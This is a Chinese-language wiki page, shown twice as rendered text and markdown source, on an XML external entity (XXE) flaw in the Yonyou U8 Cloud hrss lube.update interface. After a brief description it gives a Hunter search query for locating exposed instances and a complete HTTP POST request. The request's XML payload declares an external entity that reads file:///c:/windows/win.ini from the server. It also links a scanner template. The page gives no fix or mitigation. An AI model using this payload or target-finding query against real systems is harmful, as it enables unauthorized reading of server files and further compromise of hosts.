fofamini-wiki

登录白背景

源码

用友U8 Cloud lube.update存在xxe漏洞

一、漏洞简介

用友U8 Cloud是用友公司推出的企业上云数字化平台，为成长型和创新型企业提供全面的云ERP解决方案。用友U8 Cloud hrss下lube.update接口存在XML外部实体注入漏洞，由于用友U8 Cloud 未对用户的输入进行有效的过滤，攻击者可通过xml实体注入漏洞获取敏感信息，进一步利用可造成主机失陷。

二、影响版本

用友U8 Cloud

三、资产测绘

hunterapp.name="用友 U8 Cloud"

登录页面

四、漏洞复现

POST /hrss/dorado/lube.update.d?__rpc=true&__rpcAgent=true HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Connection: close
Content-Length: 450
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded

__type=updateData&__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY test  SYSTEM "file:///c:/windows/win.ini" >]><rpc transaction="10" method="resetPwd"><def><dataset type="Custom" id="dsResetPwd"><f name="user"></f></dataset></def><data><rs dataset="dsResetPwd"><r id="10008" state="insert"><n><v>1</v></n></r></rs></data><vps><p name="__profileKeys">%26test;</p></vps></rpc>&1404976068948

用友-U8C-Cloud-lube-update-XXE.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/pabuf84wy3ndsg1a

# 用友U8 Cloud lube.update存在xxe漏洞

# 一、漏洞简介
  用友U8 Cloud是用友公司推出的企业上云数字化平台，为成长型和创新型企业提供全面的云ERP解决方案。用友U8 Cloud hrss下lube.update接口存在XML外部实体注入漏洞，由于用友U8 Cloud 未对用户的输入进行有效的过滤，攻击者可通过xml实体注入漏洞获取敏感信息，进一步利用可造成主机失陷。

# 二、影响版本

- 用友U8 Cloud

# 三、资产测绘

- hunter`app.name="用友 U8 Cloud"`

![image.png](./img/979gTyiHCrwMx0Gn/1692444362525-121bbed1-c72d-4cad-99db-3e18509417c1-412881.png)

- 登录页面

![image.png](./img/979gTyiHCrwMx0Gn/1692444381978-7d4ed5bf-a153-47e5-88e6-4dd97953e976-528164.png)

# 四、漏洞复现
```
POST /hrss/dorado/lube.update.d?__rpc=true&__rpcAgent=true HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Connection: close
Content-Length: 450
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded

__type=updateData&__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY test  SYSTEM "file:///c:/windows/win.ini" >]><rpc transaction="10" method="resetPwd"><def><dataset type="Custom" id="dsResetPwd"><f name="user"></f></dataset></def><data><rs dataset="dsResetPwd"><r id="10008" state="insert"><n><v>1</v></n></r></rs></data><vps><p name="__profileKeys">%26test;</p></vps></rpc>&1404976068948
```
![image.png](./img/979gTyiHCrwMx0Gn/1708965717232-7ba57a65-8f2b-4aec-992e-78fdd4e2df37-262983.png)
[用友-U8C-Cloud-lube-update-XXE.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709219608792-0641ad54-99c1-4403-b869-5f40282c7d9e.yaml?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fyaml%2F1622799%2F1709219608792-0641ad54-99c1-4403-b869-5f40282c7d9e.yaml%22%2C%22name%22%3A%22%E7%94%A8%E5%8F%8B-U8C-Cloud-lube-update-XXE.yaml%22%2C%22size%22%3A1232%2C%22ext%22%3A%22yaml%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22u0e7a0025-eb7b-414a-9291-bc218ad478b%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-yaml%22%2C%22__spacing%22%3A%22both%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22ufd99033b%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pabuf84wy3ndsg1a>